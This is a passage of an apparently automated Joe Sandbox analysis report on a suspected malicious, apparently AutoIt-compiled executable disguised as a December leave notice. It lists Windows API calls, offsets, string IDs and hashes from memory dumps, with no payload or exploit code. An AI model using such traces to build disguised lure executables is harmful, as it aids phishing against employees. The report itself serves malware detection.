                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 3877571568-3619404913
                                                      • Opcode ID: 2efe135b30491226c8f8cc45e3bbe045de7cb4794ef2d7de9de9f297f27685bc
                                                      • Instruction ID: e183cccd66743b8a9cc6082a06f984d808dec50358d32ed0702e1430f46839de
                                                      • Opcode Fuzzy Hash: 2efe135b30491226c8f8cc45e3bbe045de7cb4794ef2d7de9de9f297f27685bc
                                                      • Instruction Fuzzy Hash: 1571EEB4540345AFDB21CF68CC84FA63BE5FB88714F08451DFA8587295D739E842EB22
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00FEF37A
                                                        • Part of subcall function 00FED7DE: ClientToScreen.USER32(?,?), ref: 00FED807
                                                        • Part of subcall function 00FED7DE: GetWindowRect.USER32(?,?), ref: 00FED87D
                                                        • Part of subcall function 00FED7DE: PtInRect.USER32(?,?,00FEED5A), ref: 00FED88D
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FEF3E3
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FEF3EE
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FEF411
                                                      • _wcscat.LIBCMT ref: 00FEF441
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FEF458
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FEF471
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FEF488
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FEF4AA
                                                      • DragFinish.SHELL32(?), ref: 00FEF4B1
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FEF59C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 22d8ccc0a9d8be042c0bce514c07f3a164468e610768cef133b31bb2dabcd2ce
                                                      • Instruction ID: 53109b3b94c6dd6aba3fe9a9fca66ee3424a34e46785a9c3d50560155b0d5ff5
                                                      • Opcode Fuzzy Hash: 22d8ccc0a9d8be042c0bce514c07f3a164468e610768cef133b31bb2dabcd2ce
                                                      • Instruction Fuzzy Hash: 1E615A71108300AFC311EFA5CC85E9FBBE8BF89714F000A1EF595961A1DB35DA09DB62
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00FCAB3D
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FCAB46
                                                      • VariantClear.OLEAUT32(?), ref: 00FCAB52
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FCAC40
                                                      • __swprintf.LIBCMT ref: 00FCAC70
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00FCAC9C
                                                      • VariantInit.OLEAUT32(?), ref: 00FCAD4D
                                                      • SysFreeString.OLEAUT32(00000016), ref: 00FCADDF
                                                      • VariantClear.OLEAUT32(?), ref: 00FCAE35
                                                      • VariantClear.OLEAUT32(?), ref: 00FCAE44
                                                      • VariantInit.OLEAUT32(00000000), ref: 00FCAE80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 3730832054-3931177956
                                                      • Opcode ID: a177a51df0173f9e63415da028d555efb4832e2e2b77cf421f54b5c88c959b0d
                                                      • Instruction ID: 9cfa70e7746432ab99810594c542437209c8b11d490600f65dee36f85df9a9a8
                                                      • Opcode Fuzzy Hash: a177a51df0173f9e63415da028d555efb4832e2e2b77cf421f54b5c88c959b0d
                                                      • Instruction Fuzzy Hash: 7ED10232A0011BDBDB249FA5C986FA9B7B5BF44714F14805DE4069B180CB79FC40FBA2
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FE71FC
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FE7247
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 8e52ae71869d8d5fe0041caeb96d148afb88ef1dffa3c071f915978fe25de36d
                                                      • Instruction ID: 0424a7a1aea1a834adfae36fcbb78fa57ea6bbc78e0c71403ec8c1bf61f256c3
                                                      • Opcode Fuzzy Hash: 8e52ae71869d8d5fe0041caeb96d148afb88ef1dffa3c071f915978fe25de36d
                                                      • Instruction Fuzzy Hash: 50917F342087419BDB05FF21CC51AAEB7A5BF94310F04485DF8965B392DB78ED0AEB91
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FEE5AB
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FEBEAF), ref: 00FEE607
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FEE647
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FEE68C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FEE6C3
                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00FEBEAF), ref: 00FEE6CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FEE6DF
                                                      • DestroyIcon.USER32(?,?,?,?,?,00FEBEAF), ref: 00FEE6EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FEE70B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FEE717
                                                        • Part of subcall function 00FA0FA7: __wcsicmp_l.LIBCMT ref: 00FA1030
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 1212759294-1154884017
                                                      • Opcode ID: 1bc3a85d593f59f2d124a4522f6c119fc37356fcb938c8187b6c6ca046d02a3e
                                                      • Instruction ID: 9484e1d84bc9d1a3356d0f427d1aaddf543c6ef331a1cd7f608409189aca2738
                                                      • Opcode Fuzzy Hash: 1bc3a85d593f59f2d124a4522f6c119fc37356fcb938c8187b6c6ca046d02a3e
                                                      • Instruction Fuzzy Hash: 29612171910254BAEB20DFA5EC46FFE77A8BF08724F104105F911E60C0EB799980EB60
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CharLowerBuffW.USER32(?,?), ref: 00FCD292
                                                      • GetDriveTypeW.KERNEL32 ref: 00FCD2DF
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FCD327
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FCD35E
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FCD38C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 1148790751-4113822522
                                                      • Opcode ID: c086ad9d71da76ccfd3319d4ea856c506e843b21143f2a164c13ea129bd49fcd
                                                      • Instruction ID: 4743b479e853a7bbcc7ad8dc463b319ee7424b333dbff6f8e1c0b38af19e15f6
                                                      • Opcode Fuzzy Hash: c086ad9d71da76ccfd3319d4ea856c506e843b21143f2a164c13ea129bd49fcd
                                                      • Instruction Fuzzy Hash: 6D512A71504605AFC704EF20CD829AEB7E8FF98758F00486DF8996B251DB35EE06DB92
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00FF3973,00000016,0000138C,00000016,?,00000016,0101DDB4,00000000,?), ref: 00FC26F1
                                                      • LoadStringW.USER32(00000000,?,00FF3973,00000016), ref: 00FC26FA
                                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00FF3973,00000016,0000138C,00000016,?,00000016,0101DDB4,00000000,?,00000016), ref: 00FC271C
                                                      • LoadStringW.USER32(00000000,?,00FF3973,00000016), ref: 00FC271F
                                                      • __swprintf.LIBCMT ref: 00FC276F
                                                      • __swprintf.LIBCMT ref: 00FC2780
                                                      • _wprintf.LIBCMT ref: 00FC2829
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FC2840
                                                      Strings
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 618562835-2268648507
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FCD0D8
                                                      • __swprintf.LIBCMT ref: 00FCD0FA
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FCD137
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FCD15C
                                                      • _memset.LIBCMT ref: 00FCD17B
                                                      • _wcsncpy.LIBCMT ref: 00FCD1B7
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FCD1EC
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FCD1F7
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00FCD200
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FCD20A
                                                      Strings
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FEBEF4,?,?), ref: 00FEE754
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE76B
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE776
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE783
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FEE78C
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE79B
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FEE7A4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE7AB
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE7BC
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0100D9BC,?), ref: 00FEE7D5
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FEE7E5
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00FEE809
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00FEE834
                                                      • DeleteObject.GDI32(00000000), ref: 00FEE85C
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FEE872
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 00FD076F
                                                      • _wcscat.LIBCMT ref: 00FD0787
                                                      • _wcscat.LIBCMT ref: 00FD0799
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD07AE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD07C2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FD07DA
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FD07F4
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0806
                                                      Strings
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FEEF3B
                                                      • GetFocus.USER32 ref: 00FEEF4B
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00FEEF56
                                                      • _memset.LIBCMT ref: 00FEF081
                                                      • GetMenuItemInfoW.USER32 ref: 00FEF0AC
                                                      • GetMenuItemCount.USER32(00000000), ref: 00FEF0CC
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FEF0DF
                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00FEF113
                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00FEF15B
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FEF193
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00FEF1C8
                                                      Strings
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      APIs
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
                                                        • Part of subcall function 00FBABBB: GetLastError.KERNEL32(?,00FBA69F,?,?,?), ref: 00FBABE1
                                                        • Part of subcall function 00FBABBB: GetProcessHeap.KERNEL32(00000008,?,?,00FBA69F,?,?,?), ref: 00FBABF0
                                                        • Part of subcall function 00FBABBB: HeapAlloc.KERNEL32(00000000,?,00FBA69F,?,?,?), ref: 00FBABF7
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FBAC0E
                                                        • Part of subcall function 00FBAC56: GetProcessHeap.KERNEL32(00000008,00FBA6B5,00000000,00000000,?,00FBA6B5,?), ref: 00FBAC62
                                                        • Part of subcall function 00FBAC56: HeapAlloc.KERNEL32(00000000,?,00FBA6B5,?), ref: 00FBAC69
                                                        • Part of subcall function 00FBAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FBA6B5,?), ref: 00FBAC7A
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FBA8CB
                                                      • _memset.LIBCMT ref: 00FBA8E0
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FBA8FF
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA910
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FBA94D
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FBA969
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA986
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FBA995
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FBA99C
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FBA9BD
                                                      • CopySid.ADVAPI32(00000000), ref: 00FBA9C4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FBA9F5
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FBAA1B
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FBAA2F
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00FD9E36
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FD9E42
                                                      • CreateCompatibleDC.GDI32(?), ref: 00FD9E4E
                                                      • SelectObject.GDI32(00000000,?), ref: 00FD9E5B
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FD9EAF
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00FD9EEB
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FD9F0F
                                                      • SelectObject.GDI32(00000006,?), ref: 00FD9F17
                                                      • DeleteObject.GDI32(?), ref: 00FD9F20
                                                      • DeleteDC.GDI32(00000006), ref: 00FD9F27
                                                      • ReleaseDC.USER32(00000000,?), ref: 00FD9F32
                                                      Strings
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2889450990-2391861430
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2889450990-3420473620
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC55D7
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FC5664
                                                      • GetMenuItemCount.USER32(01041708), ref: 00FC56ED
                                                      • DeleteMenu.USER32(01041708,00000005,00000000,000000F5,?,?), ref: 00FC577D
                                                      • DeleteMenu.USER32(01041708,00000004,00000000), ref: 00FC5785
                                                      • DeleteMenu.USER32(01041708,00000006,00000000), ref: 00FC578D
                                                      • DeleteMenu.USER32(01041708,00000003,00000000), ref: 00FC5795
                                                      • GetMenuItemCount.USER32(01041708), ref: 00FC579D
                                                      • SetMenuItemInfoW.USER32(01041708,00000004,00000000,00000030), ref: 00FC57D3
                                                      • GetCursorPos.USER32(?), ref: 00FC57DD
                                                      • SetForegroundWindow.USER32(00000000), ref: 00FC57E6
                                                      • TrackPopupMenuEx.USER32(01041708,00000000,?,00000000,00000000,00000000), ref: 00FC57F9
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FC5805
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      • Opcode ID: 3ff51f2e883232e5943f2cc668ad9305dc781be1ecc344a87398fa8658efd1f0
                                                      • Instruction ID: 6bd20711cec8f2069426503a5c98e5a77c58b8dbed0cf4efff29a253b5adeb01
                                                      • Opcode Fuzzy Hash: 3ff51f2e883232e5943f2cc668ad9305dc781be1ecc344a87398fa8658efd1f0
                                                      • Instruction Fuzzy Hash: 9771E571A4060ABFEB219F94CD4AFAABF65FF00B64F240209F5146A1D1C7757890FBA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FBA1DC
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FBA211
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FBA22D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FBA249
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FBA273
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FBA29B
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FBA2A6
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FBA2AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1687751970-22481851
                                                      • Opcode ID: 8335d412b339ec6e028f65594c2d5c4fcba4c778949ba20d1438c9eb429c5b11
                                                      • Instruction ID: 8ca134ab8788e4112f2a73c16d4ee3b58c596d534d207d0ab7549982980d6301
                                                      • Opcode Fuzzy Hash: 8335d412b339ec6e028f65594c2d5c4fcba4c778949ba20d1438c9eb429c5b11
                                                      • Instruction Fuzzy Hash: 13410576C10629ABDB21EBA4DC85DEEB7B8BF04750F004029F805A7150EB799E05EFA0
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 834bc97ffa7244f21f2fb3a4489213f37b228af25afbe3a09d91f69e68360362
                                                      • Instruction ID: 17235e539ee44c51d252f6dc6d5a9a73c3e0694e6b8079db255dd75bf49ab30a
                                                      • Opcode Fuzzy Hash: 834bc97ffa7244f21f2fb3a4489213f37b228af25afbe3a09d91f69e68360362
                                                      • Instruction Fuzzy Hash: 31416F3150028E9BDF10EF15DC49AEA3365BF62310F104854ECD59B792EB74EE0AEB50
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FF36F4,00000010,?,Bad directive syntax error,0101DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FC25D6
                                                      • LoadStringW.USER32(00000000,?,00FF36F4,00000010), ref: 00FC25DD
                                                      • _wprintf.LIBCMT ref: 00FC2610
                                                      • __swprintf.LIBCMT ref: 00FC2632
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FC26A1
                                                      Strings
